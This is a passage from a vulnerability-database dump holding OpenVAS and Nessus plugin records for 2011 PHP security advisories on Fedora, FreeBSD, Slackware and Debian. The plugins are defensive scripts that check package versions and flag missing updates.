GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066105.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863531\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-20 15:38:54 +0200 (Tue, 20 Sep 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-11528\");\n script_cve_id(\"CVE-2011-2483\", \"CVE-2011-2202\", \"CVE-2011-1938\", \"CVE-2011-1148\", \"CVE-2011-3182\");\n script_name(\"Fedora Update for maniadrive FEDORA-2011-11528\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'maniadrive'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"maniadrive on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"maniadrive\", rpm:\"maniadrive~1.2~32.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:39:22", "description": "PHP development team reports :\n\nSecurity Enhancements and Fixes in PHP 5.3.7 :\n\n- Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n- Fixed crash in error_log(). Reported by Mateusz Kocielski\n\n- Fixed buffer overflow on overlog salt in crypt().\n\n- Fixed bug #54939 (File path injection vulnerability in RFC1867 File\nupload filename). Reported by Krzysztof Kotowicz. (CVE-2011-2202)\n\n- Fixed stack-based buffer overflow in socket_connect(). (CVE-2011-1938)\n\n- Fixed bug #54238 (use-after-free in substr_replace()).\n(CVE-2011-1148)", "edition": 24, "published": "2011-08-20T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (057bf770-cac4-11e0-aea3-00215c6a37bb)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "modified": "2011-08-20T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php5-sockets"], "id": "FREEBSD_PKG_057BF770CAC411E0AEA300215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/nessus/55912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55912);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\");\n script_bugtraq_id(49241);\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (057bf770-cac4-11e0-aea3-00215c6a37bb)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP development team reports :\n\nSecurity Enhancements and Fixes in PHP 5.3.7 :\n\n- Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n- Fixed crash in error_log(). Reported by Mateusz Kocielski\n\n- Fixed buffer overflow on overlog salt in crypt().\n\n- Fixed bug #54939 (File path injection vulnerability in RFC1867 File\nupload filename). Reported by Krzysztof Kotowicz. (CVE-2011-2202)\n\n- Fixed stack-based buffer overflow in socket_connect(). (CVE-2011-1938)\n\n- Fixed bug #54238 (use-after-free in substr_replace()).\n(CVE-2011-1148)\"\n );\n # https://vuxml.freebsd.org/freebsd/057bf770-cac4-11e0-aea3-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?236b579e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.3.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-sockets<5.3.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:36", "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\n13.0, 13.1, 13.37, and -current to fix security issues.", "edition": 24, "published": "2011-08-26T00:00:00", "title": "Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : php (SSA:2011-237-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "modified": "2011-08-26T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2011-237-01.NASL", "href": "https://www.tenable.com/plugins/nessus/55980", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2011-237-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55980);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\");\n script_bugtraq_id(46843, 47950, 48259, 49241);\n script_xref(name:\"SSA\", value:\"2011-237-01\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : php (SSA:2011-237-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\n13.0, 13.1, 13.37, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.575575\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c1f1ac5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.3.8\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:47:14", "description": "Several vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues :\n\n - CVE-2011-1938\n The UNIX socket handling allowed attackers to trigger a\n buffer overflow via a long path name.\n\n - CVE-2011-2483\n The crypt_blowfish function did not properly handle\n 8-bit characters, which made it easier for attackers to\n determine a cleartext password by using knowledge of a\n password hash.\n\n - CVE-2011-4566\n When used on 32 bit platforms, the exif extension could\n be used to trigger an integer overflow in the\n exif_process_IFD_TAG function when processing a JPEG\n file.\n\n - CVE-2011-4885\n It was possible to trigger hash collisions predictably\n when parsing form parameters, which allows remote\n attackers to cause a denial of service by sending many\n crafted parameters.\n\n - CVE-2012-0057\n When applying a crafted XSLT transform, an attacker\n could write files to arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of\nthis function: it is now incompatible with some old (wrongly)\ngenerated hashes for passwords containing 8-bit characters. See the\npackage NEWS entry for details. This change has not been applied to\nthe Lenny version of PHP.", "edition": 18, "published": "2012-02-01T00:00:00", "title": "Debian DSA-2399-2 : php5 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "modified": "2012-02-01T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:php5"], "id": "DEBIAN_DSA-2399.NASL", "href": "https://www.tenable.com/plugins/nessus/57753", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2399. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57753);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1938\", \"CVE-2011-2483\", \"CVE-2011-4566\", \"CVE-2011-4885\", \"CVE-2012-0057\");\n script_bugtraq_id(47950, 49241, 50907, 51193);\n script_xref(name:\"DSA\", value:\"2399\");\n\n script_name(english:\"Debian DSA-2399-2 : php5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues :\n\n - CVE-2011-1938\n The UNIX socket handling allowed attackers to trigger a\n buffer overflow via a long path name.\n\n - CVE-2011-2483\n The crypt_blowfish function did not properly handle\n 8-bit characters, which made it easier for attackers to\n determine a cleartext password by using knowledge of a\n password hash.\n\n - CVE-2011-4566\n When used on 32 bit platforms, the exif extension could\n be used to trigger an integer overflow in the\n exif_process_IFD_TAG function when processing a JPEG\n file.\n\n - CVE-2011-4885\n It was possible to trigger hash collisions predictably\n when parsing form parameters, which allows remote\n attackers to cause a denial of service by sending many\n crafted parameters.\n\n - CVE-2012-0057\n When applying a crafted XSLT transform, an attacker\n could write files to arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of\nthis function: it is now incompatible with some old (wrongly)\ngenerated hashes for passwords containing 8-bit characters. See the\npackage NEWS entry for details. This change has not been applied to\nthe Lenny version of PHP.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-1938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2399\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny15.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"php5\", reference:\"5.2.6.dfsg.1-1+lenny15\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gmp\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-intl\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3-7+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3-7+squeeze6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:07", "description": "Security Enhancements and Fixes :\n\n - Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n - Fixed crash in error_log(). Reported by Mateusz\n Kocielski\n\n - Fixed buffer overflow on overlog salt in crypt().\n\n - Fixed bug #54939 (File path injection vulnerability in\n RFC1867 File upload filename). Reported by Krzysztof\n Kotowicz. (CVE-2011-2202)\n\n - Fixed stack-based buffer overflow in socket_connect().\n (CVE-2011-1938)\n\n - Fixed bug #54238 (use-after-free in substr_replace()).\n (CVE-2011-1148)\n\nUpstream announce for 5.3.8:\nhttp://www.php.net/archive/2011.php#id2011-08-23-1 Upstream announce\nfor 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1\n\nFull Changelog: http://www.php.net/ChangeLog-5.php#5.3.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-09-19T00:00:00", "title": "Fedora 14 : maniadrive-1.2-32.fc14 / php-5.3.8-1.fc14 / php-eaccelerator-0.9.6.1-9.fc14 (2011-11537)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-2202"], "modified": "2011-09-19T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:14", "p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2011-11537.NASL", "href": "https://www.tenable.com/plugins/nessus/56219", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-11537.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56219);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\");\n script_bugtraq_id(46843, 47950, 48259, 49241, 49249);\n script_xref(name:\"FEDORA\", value:\"2011-11537\");\n\n script_name(english:\"Fedora 14 : maniadrive-1.2-32.fc14 / php-5.3.8-1.fc14 / php-eaccelerator-0.9.6.1-9.fc14 (2011-11537)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Enhancements and Fixes :\n\n - Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n - Fixed crash in error_log(). Reported by Mateusz\n Kocielski\n\n - Fixed buffer overflow on overlog salt in crypt().\n\n - Fixed bug #54939 (File path injection vulnerability in\n RFC1867 File upload filename). Reported by Krzysztof\n Kotowicz. (CVE-2011-2202)\n\n - Fixed stack-based buffer overflow in 